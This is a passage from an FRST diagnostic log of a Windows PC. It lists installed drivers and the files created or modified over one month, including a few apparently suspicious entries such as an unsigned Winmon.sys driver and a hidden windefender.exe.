R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-26] (Martin Malik - REALiX -> REALiX™)
R3 L1C; C:\WINDOWS\System32\drivers\L1C63x64.sys [121344 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Co., Ltd.)
S3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-10-20] (Logitech Inc -> Logitech Inc.)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [216544 2019-11-25] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2019-11-25] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [278344 2019-11-25] (Malwarebytes Inc -> Malwarebytes)
R1 MpKslDrv; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{8DCDDCF9-B5F0-455F-9377-8A6F593207EF}\MpKslDrv.sys [58120 2019-11-25] (Microsoft Corporation -> Microsoft Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys [17194584 2018-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-05-10] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
S3 ptun0901; C:\WINDOWS\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R0 pwdrvio; C:\WINDOWS\System32\pwdrvio.sys [19152 2013-09-30] (MiniTool Solution Ltd -> )
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [12504 2013-09-30] (MiniTool Solution Ltd -> )
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [228616 2019-04-23] (Invincea, Inc. -> Sandboxie Holdings, LLC)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 teVirtualMIDI64; C:\WINDOWS\system32\DRIVERS\teVirtualMIDI64.sys [41016 2015-07-12] (Tobias Erichsen -> Tobias Erichsen)
S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2016-12-21] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
R1 veracrypt; C:\WINDOWS\System32\drivers\veracrypt.sys [631200 2018-01-16] (IDRIX -> IDRIX)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46472 2019-10-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [351968 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [53984 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
S3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [9352 2019-11-24] (WDKTestCert Admin,131480495282941941 -> ) [File not signed]
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-06-03] (Zemana Ltd. -> Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-25 01:39 - 2019-11-25 01:39 - 000000000 ____D C:\Users\SR\AppData\Roaming\EpicNet Inc
2019-11-25 01:38 - 2019-11-25 01:38 - 000278344 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2019-11-25 01:38 - 2019-11-25 01:38 - 000216544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2019-11-25 01:38 - 2019-11-25 01:38 - 000003258 _____ C:\WINDOWS\system32\Tasks\csrss
2019-11-25 00:08 - 2019-11-25 00:08 - 000000872 _____ C:\Users\Public\Desktop\REAPER (x64).lnk
2019-11-25 00:08 - 2019-11-25 00:08 - 000000872 _____ C:\ProgramData\Desktop\REAPER (x64).lnk
2019-11-25 00:08 - 2019-11-25 00:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\REAPER (x64)
2019-11-24 20:00 - 2019-11-24 20:00 - 000081073 _____ C:\Users\SR\Desktop\Addition.txt
2019-11-24 20:00 - 2019-11-24 20:00 - 000060028 _____ C:\Users\SR\Desktop\FRST.txt
2019-11-24 19:50 - 2019-11-25 10:21 - 000000000 ____D C:\FRST
2019-11-24 18:57 - 2019-11-24 18:57 - 002079744 ____H C:\WINDOWS\windefender.exe
2019-11-24 18:57 - 2019-11-24 18:57 - 000023272 _____ (Windows ® Win 7 DDK provider) C:\WINDOWS\system32\Drivers\WinmonFS.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000009352 _____ C:\WINDOWS\system32\Drivers\Winmon.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ___HD C:\WINDOWS\rss
2019-11-24 00:05 - 2019-11-24 00:05 - 000000000 ____D C:\Users\SR\Documents\Joshua Bell Violin
2019-11-23 23:48 - 2019-11-24 00:35 - 000011305 _____ C:\Users\SR\Desktop\Named Notes for various VIs.xlsx
2019-11-23 22:00 - 2019-11-24 18:58 - 000009127 _____ C:\Users\SR\Desktop\New Microsoft Excel Worksheet.xlsx
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Users\SR\AppData\Roaming\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exponential Audio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\AudioUTOPiA
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Program Files\Common Files\vst3
2019-11-19 23:08 - 2019-11-19 23:09 - 000000000 ____D C:\Users\SR\Desktop\New folder
2019-11-19 21:06 - 2019-11-19 18:40 - 000514360 _____ C:\Users\SR\Desktop\Spitfire Solo Cello.nicnt
2019-11-19 18:32 - 2019-11-19 18:32 - 000000040 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkc
2019-11-19 17:50 - 2019-11-19 17:50 - 000000000 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkx
2019-11-18 13:04 - 2019-11-18 13:04 - 000001289 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FolderSize.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\Users\Public\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\ProgramData\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000000000 __HDC C:\ProgramData\{06D838A8-9544-4D7D-808F-4ED187621BBB}
2019-11-17 22:49 - 2019-11-17 23:42 - 000000000 ____D C:\Users\SR\Desktop\old Native Instruments folder
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\Users\Public\Documents\NI Resources
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\ProgramData\Documents\NI Resources
2019-11-16 00:54 - 2019-11-16 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2019-11-14 14:19 - 2019-11-14 14:19 - 000051024 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\AppData\Roaming\Subversion
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\.android
2019-11-11 14:04 - 2019-11-11 14:04 - 000000000 ____D C:\Users\SR\Documents\Embarcadero
2019-11-11 13:49 - 2019-11-11 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero InterBase XE7
2019-11-11 13:49 - 2016-02-25 19:35 - 001287496 _____ (Embarcadero Technologies, Inc.) C:\WINDOWS\SysWOW64\gds32.dll
2019-11-11 13:49 - 2016-02-25 19:35 - 000031560 _____ (Embarcadero Technologies, Inc.) C:\WINDOWS\SysWOW64\ibxml.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 001766728 _____ (Embarcadero Technologies, Inc.) C:\WINDOWS\system32\ibclient64.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 000034632 _____ (Embarcadero Technologies, Inc.) C:\WINDOWS\system32\ibxml64.dll
2019-11-11 13:48 - 2019-11-11 13:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\Users\Public\Documents\Embarcadero
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\ProgramData\Documents\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\Users\SR\AppData\Roaming\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\ProgramData\Embarcadero
2019-11-11 00:57 - 2019-11-11 00:57 - 000000000 ____D C:\Users\SR\AppData\Local\PackageAware
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\wxWidgets-3.0.4
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wxWidgets 3.0.4
2019-11-10 22:32 - 2019-11-10 23:12 - 000000000 ____D C:\Users\SR\Documents\srCodeBlock
2019-11-10 22:27 - 2019-11-11 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2019-11-10 22:27 - 2019-11-10 23:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\CodeBlocks
2019-11-10 20:56 - 2019-11-10 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-11-10 20:55 - 2019-11-10 20:55 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files\Application Verifier
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-11-10 20:40 - 2018-04-11 06:46 - 000402944 _____ (Windows ® Win 7 DDK provider) C:\WINDOWS\system32\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 06:44 - 000350208 _____ (Microsoft Corporation) C:\WINDOWS\system32\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-11 05:12 - 000380416 _____ (Windows ® Win 7 DDK provider) C:\WINDOWS\SysWOW64\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 05:11 - 000271360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-10 21:41 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:37 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 017871360 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 014058496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 004529664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 003632640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 002249728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 001100288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000466944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 001359872 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsExperiment.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 004858880 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 001500160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000921088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 000539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 005746688 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:05 - 002000896 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:04 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:03 - 002818560 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:02 - 001178624 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:02 - 000286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsExperiment.dll
2019-11-10 20:36 - 2019-11-10 20:36 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Users\SR\.dotnet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Program Files\dotnet
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1028
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1028
2019-11-10 20:34 - 2019-11-10 20:34 - 000001843 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-11-10 20:34 - 2019-11-10 20:34 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-11-10 20:33 - 2019-11-10 20:33 - 000001499 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-11-05 18:52 - 2019-11-05 18:52 - 000000000 ____D C:\Users\SR\AppData\Local\Viber
2019-10-28 22:34 - 2019-10-28 22:34 - 000000000 ____D C:\Users\SR\Desktop\FIFA-19---Career-Mode-Cheat-Table-master
2019-10-26 12:03 - 2019-10-26 12:03 - 000002149 _____ C:\Users\SR\Desktop\FTX GLOBAL VECTOR Configuration Tool.exe - Shortcut.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-25 10:21 - 2019-08-14 11:29 - 000104013 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2019-11-25 10:18 - 2018-06-02 15:16 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-11-25 10:18 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-11-25 01:43 - 2017-05-25 17:31 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Mozilla
2019-11-25 01:42 - 2018-06-02 15:28 - 001464880 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-11-25 01:42 - 2018-06-02 13:32 - 000550540 _____ C:\WINDOWS\system32\perfh008.dat
2019-11-25 01:42 - 2018-06-02 13:32 - 000088248 _____ C:\WINDOWS\system32\perfc008.dat
2019-11-25 01:42 - 2018-04-12 01:36 - 000000000 ____D C:\WINDOWS\INF
2019-11-25 01:40 - 2018-06-01 16:16 - 000000000 ____D C:\ProgramData\NVIDIA
2019-11-25 01:38 - 2019-08-11 17:31 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2019-11-25 01:38 - 2019-08-11 17:31 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2019-11-25 01:38 - 2019-08-11 17:31 - 000002024 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-11-25 01:38 - 2019-08-11 17:31 - 000002024 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2019-11-25 01:38 - 2018-06-06 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-11-25 01:38 - 2018-06-02 15:24 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-11-25 01:38 - 2017-11-23 11:26 - 000000000 ____D C:\Users\SR\AppData\Local\cache
2019-11-25 01:38 - 2017-10-10 18:36 - 000000000 ____D C:\Users\SR\Documents\DesktopReminder
2019-11-25 01:38 - 2017-06-15 17:44 - 000000000 ____D C:\ProgramData\Reprise
2019-11-25 01:35 - 2018-04-11 23:04 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2019-11-25 01:33 - 2017-08-27 21:09 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Temp
2019-11-25 01:28 - 2018-06-02 15:24 - 000000000 ____D C:\WINDOWS\system32\Tasks\JumpingBytes
2019-11-25 00:39 - 2017-05-26 14:22 - 000000000 ____D C:\Users\SR\AppData\Local\CrashDumps
2019-11-25 00:08 - 2017-05-26 16:40 - 000000000 ____D C:\Program Files\REAPER (x64)
2019-11-24 23:31 - 2018-06-02 15:19 - 000000000 ____D C:\Users\SR
2019-11-24 23:30 - 2018-10-19 19:31 - 000000000 ____D C:\WINDOWS\Minidump
2019-11-24 23:30 - 2016-09-24 20:11 - 000355058 ____N C:\WINDOWS\Minidump\112419-10000-01.dmp
2019-11-24 18:57 - 2017-06-12 13:15 - 000011914 __RSH C:\ProgramData\ntuser.pol
2019-11-24 18:37 - 2017-05-26 12:04 - 000000000 ____D C:\Users\SR\AppData\Roaming\qBittorrent
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\WINDOWS\system32\BMXStateBkp-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\WINDOWS\system32\BMXState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000011564 _____ C:\WINDOWS\system32\DVCState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\WINDOWS\system32\BMXCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\WINDOWS\system32\BMXBkpCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 10:51 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-11-23 18:35 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-11-22 21:41 - 2017-05-26 15:08 - 000002096 _____ C:\WINDOWS\Sandboxie.ini
2019-11-21 20:12 - 2019-02-18 21:23 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-11-21 19:49 - 2017-05-26 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2019-11-21 17:13 - 2019-07-15 15:01 - 000000000 ____D C:\Users\SR\AppData\Roaming\ViberPC
2019-11-21 01:11 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2019-11-19 23:10 - 2017-05-26 16:56 - 000000000 ____D C:\Program Files\Native Instruments
2019-11-19 11:34 - 2019-03-02 14:15 - 000634880 _____ C:\Users\SR\Documents\MeNew_v2.fmp12
2019-11-18 17:19 - 2017-09-08 20:54 - 000000000 ____D C:\Users\SR\Documents\REAPER Media
2019-11-18 15:43 - 2019-10-19 15:18 - 000018960 _____ (Logitech, Inc.) C:\WINDOWS\system32\Drivers\LNonPnP.sys
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2019-11-17 21:04 - 2017-09-08 20:57 - 000027684 _____ C:\Users\SR\Desktop\sc3.tmp
2019-11-17 15:25 - 2017-05-26 12:41 - 000000000 ____D C:\Users\SR\Documents\Camtasia Studio
2019-11-17 13:17 - 2018-01-16 19:24 - 000000000 ____D C:\Users\SR\AppData\Roaming\vlc
2019-11-16 00:54 - 2018-01-03 12:14 - 000000000 ____D C:\Program Files (x86)\Dropbox
2019-11-16 00:19 - 2018-11-26 20:34 - 000006144 _____ C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-11-14 19:23 - 2017-09-08 22:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\Mp3tag
2019-11-14 13:00 - 2018-06-02 15:24 - 000003374 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3967059023-4107875624-2872843465-1001
2019-11-14 13:00 - 2018-06-02 15:19 - 000002403 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-11-14 13:00 - 2017-05-25 17:10 - 000000000 ___RD C:\Users\SR\OneDrive
2019-11-14 12:13 - 2018-04-12 15:16 - 000000000 ____D C:\Users\SR\AppData\Local\PlaceholderTileLogoFolder
2019-11-13 15:13 - 2018-02-14 15:35 - 000000000 ____D C:\Users\SR\AppData\Local\Packages
2019-11-13 13:02 - 2017-05-25 19:45 - 000748816 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2019-11-12 12:45 - 2018-06-02 15:16 - 005163280 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-11-11 17:40 - 2018-01-03 12:23 - 000000000 ___RD C:\Users\SR\Dropbox
2019-11-11 15:38 - 2017-08-27 19:44 - 000000000 ____D C:\Users\SR\AppData\Roaming\Visual Studio Setup
2019-11-11 13:49 - 2015-07-10 13:04 - 000017535 _____ C:\WINDOWS\system32\Drivers\etc\services
2019-11-11 13:48 - 2017-09-07 13:40 - 000000000 ____D C:\Users\SR\.oracle_jre_usage
2019-11-11 13:48 - 2017-05-26 16:29 - 000000000 ____D C:\Program Files\Java
2019-11-11 13:48 - 2017-05-25 21:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-11-10 20:52 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2019-11-10 20:48 - 2017-06-30 19:12 - 000000000 ____D C:\ProgramData\Package Cache
2019-11-10 20:46 - 2018-04-12 01:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-11-10 20:34 - 2017-08-27 19:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2019-11-10 20:34 - 2017-06-11 17:39 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2019-11-10 20:33 - 2018-06-02 13:14 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-11-10 20:33 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-11-10 20:33 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2019-11-10 16:31 - 2019-01-08 14:50 - 000000000 ____D C:\Users\SR\AppData\Roaming\temp_info_collect
2019-11-10 16:30 - 2019-01-08 14:50 - 000000000 ____D C:\ProgramData\EMM
2019-11-09 19:38 - 2017-08-27 20:07 - 000000000 ____D C:\Users\SR\Documents\Visual Studio 2017
2019-11-09 19:32 - 2017-08-27 19:44 - 000001402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2019-11-08 14:06 - 2019-10-09 15:00 - 000000000 ____D C:\Users\SR\Desktop\Unused Mods
